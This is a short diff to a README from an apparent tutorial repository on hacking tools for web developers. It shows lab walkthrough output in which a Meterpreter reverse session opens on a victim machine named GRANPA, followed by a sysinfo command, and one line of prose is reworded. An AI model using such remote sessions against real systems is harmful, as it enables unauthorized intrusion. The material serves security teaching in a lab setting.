notsag-dev/hacking-tools-for-web-developers/README.md

 [*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.14:1030) at 2020-09-20 12:49:01 -0400
 ```

 Boom!
-We have open a Meterpreter session on the victim server.
-Let's use it to get some info about the system:
+We have access to the victim server!
 ```
 meterpreter > sysinfo
 Computer        : GRANPA